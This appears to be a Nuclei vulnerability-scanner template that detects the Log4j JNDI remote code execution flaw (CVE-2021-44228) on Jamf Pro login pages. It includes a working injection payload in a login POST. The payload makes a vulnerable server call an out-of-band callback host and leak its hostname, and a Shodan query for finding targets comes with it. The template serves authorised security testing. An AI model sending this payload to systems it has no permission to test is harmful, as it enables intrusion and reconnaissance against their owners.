id: jamf-pro-log4j-rce info: name: JamF Pro - Remote Code Execution (Apache Log4j) author: DhiyaneshDK,pdteam severity: critical description: | JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV). reference: - https://github.com/random-robbie/jamf-log4j - https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html - https://community.connection.com/what-is-jamf/ - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: verified: true max-request: 1 shodan-query: title:"Jamf Pro" tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password= matchers-condition: and matchers: - type: word part: body words: - "Jamf Pro Login" - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' extractors: - type: kval kval: - interactsh_ip - type: regex part: interactsh_request group: 2 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - type: regex part: interactsh_request group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # digest: 4b0a00483046022100ef80a2e9d710307dc33ce06f7c012d5381ae2ca17d26f387b0485a6e2cce91790221009cb0b487e4ed5e81dfd9a55d4059624d37f20bd5f3f573b9e17e2d7379137f1d:922c64590222798bb761d5b6d8e72950